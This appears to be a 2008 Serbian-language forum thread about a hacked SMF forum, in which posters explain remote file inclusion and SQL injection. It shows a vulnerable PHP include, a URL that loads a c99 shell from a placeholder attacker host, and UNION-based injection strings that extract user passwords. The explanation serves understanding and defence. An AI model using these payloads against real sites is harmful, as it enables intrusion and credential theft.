Gde je Admin.php / PHP injection

MarkoWeb · September 24, 2008, 05:14:14 AM

http://www.simplemachines.org/about/security.php

[S]ETI_explorer · September 24, 2008, 05:19:49 AM

hmm..

php injection je tehnika napada u kojoj napadač koristi rupu u skripti i includuje fajl sa nekog drugog servera - RFI == Remote File Inclusion. Evo primera:

Code Select


<?php
include ('$stranica');
?>

ukoliko ti nigde ne proveriš ovo $stranica, haker može u URL uneti sledeće:

Code Select

http://radnjivsajt.com/ranjiva_stranica.php?stranica=http://hakerovhost/c99.txt

i tako će se na mestu gde bi se inače nalazila stranica koju includuješ, naći c99 shell

to je to ukratko.. ovo sa ćime ti imaš problem... ako ti neko upadne u admin panel SMF-a, može ti, kao što znaš, promeniti index.template.php i style.css teme koju koristiš, i može skinuti (loš) backup baze.

Ovo je urađeno sa namerom da se zarazi, veći broj računara, znači neko je upao na server.

E sad, nemoj odmah po hostu.. Možda ti je lozinka za FTP bila loša, ili si keyloggovan, ili je neko upao ne neki drugi sajt koji je isto kod verata, a kod njih je recimo uključen shell acces (što me nebi začudilo) i onda taj neko ima pristup svim sajtovima sa tog servera.

Moj savet je da zatražiš logove sa servera od tog dana kada se ovo pojavilo... biće to jedan ogroman fajl ali vredi pokušati

Bob Marley · September 24, 2008, 05:26:10 AM

QuoteMoj savet je da zatražiš logove sa servera od tog dana kada se ovo pojavilo...

Zahtevao! Dobio odgovor "Nasi serveri ne cuvaju logove" (?!?!?!?!)

QuoteMožda ti je lozinka za FTP bila loša, ili si keyloggovan,

Pass za ftp je upravo promenjen. Ostaje da vidimo da li je to bio problem.

Da li je moguce da je neka od modifikacija za smf "busna" tj. koliko su uopste modifikacije sigurne.

Mislim da nisam do sada video nigde na nasem delu foruma pricu o tome.

Kada mi je "pao" Forum bile su instalirane sledece modifikacije (neke od njih rucno zbog teme)

[u]nkn0wn · September 24, 2008, 01:43:19 PM

Pa od ovh modifikacija sam skoro sve koristio i nisam imao problema... Jedino mislim da ti mod "Are You Human?" nije uopšte potreban...

MarkoWeb · September 24, 2008, 02:13:06 PM

YouTube, Feed icon, Favicon ovo si mogo da ubacis za 2 min. bez koriscenja bilo kakvog moda.

Custom copyright ne znam cemu sluzi ali verovatno ti daje opciju da promenis copyright, pored toga sto to nije lepo nije ni tesko uraditi bez mod-a, taj mod ako stvarno sluzi menjaju copyright-a je sigurno nebezbedan sobzirom da sam siguran dasmf nebi nikad odobrio tako nesto.

Ravac · September 24, 2008, 02:41:37 PM

Custom copyright samo dodaje iznad pravog copyright-a ono sto ti zeli, a to se moze dodati rucno za 30 sec.(kako znam lol)

[S]ETI_explorer · September 24, 2008, 04:00:53 PM

Hmm.. svi modovi se pregledaju od strane nekoga iz SMF tima tako da niti jedan mod koji skineš sa ovog sajta ne bi smeo da bude "bušan"

Bob Marley · September 24, 2008, 04:06:47 PM

Quote from: ravac on September 24, 2008, 02:41:37 PM
Custom copyright samo dodaje iznad pravog copyright-a ono sto ti zeli, a to se moze dodati rucno za 30 sec.(kako znam lol)

Bravo! Ucis

Quote from: SETI_explorer on September 24, 2008, 04:00:53 PM

Hmm.. svi modovi se pregledaju od strane nekoga iz SMF tima tako da niti jedan mod koji skineš sa ovog sajta ne bi smeo da bude "bušan"

I na kraju opet ostaje pitanje kako se ovo desilo. Meni je ovo jako zanimljiva tematika. Zanima me konkretno da li neko zna kako radi sql injection. tj hack same baze

dan555 · September 24, 2008, 05:22:48 PM

Guglaj malo sa "sql injection", mene je to isto interesovalo pa sam tako našao neke zgodne članke.
Počni od Wikipedie.

Taj problem se, koliko sam shvatio, rešava jednom php funkcijom koja dodaje obrnutu kosu crtu ispred (') i ("), ako sam dobro zapamtio (a verovatno nisam).

Što se tiče sigurnosti modifikacija na ovom sajtu. Meni je u SMF Shoutbox (sbox_v1.16) jedan dečko ubacio JavaSkript kod, tako da nisam baš ubeđen da nema rupa. Taj mod je, doduše, unapređen upavo u segmentu sigurnosti, pa je možda sada bolji u tom pogledu.

[S]ETI_explorer · September 24, 2008, 05:23:08 PM

nije ni to previše komplikovano....

recimo imaš upit:

Code Select

mysql_query("SELECT * FROM `news` WHERE `id` = '$id' ORDER BY `broj` ASC");

a imaš da ti je ovo $id = $_GET['id'];

i ako si sa tim zavrsio posao napravio si neverovatan propust...

haker u URL može uneti ' i dobice obaveštenje o tome da postoji greška u upitu što će mu reći da tu stvari i nisu baš najbolje....

onda može saznati broj kolona u tabeli news...:

Code Select

?id=100 order by 1/*

i tako će povećavati ovaj zadnji broj sve dok ne dobije grešku koja ga obaveštava da je kolona sa tim brojem nepoznata..

e sad ide zanimljivi deo... on baš i nema koristi od brljanja po tabeli 'news' on će probati da dobije admin pristup... ili hoće dobiti podatke o korisnicima... porbaće sa UNION komadnom..

ako recimo u news tabeli imate 5 kolona... upit će izgledati od prilike ovako:

Code Select

?id=100 union all select 1, pass,3,4,5 from users/*

tu na scenu stupa odgovornost administratora... ako je pri konstrukciji sajta napisao sistem za registraciju kako treba (hashuje sve lozinke), otezace malo zivot hakeru

, ako nije.. ovo moze imati katastrofalne posledice..

News:

Gde je Admin.php / PHP injection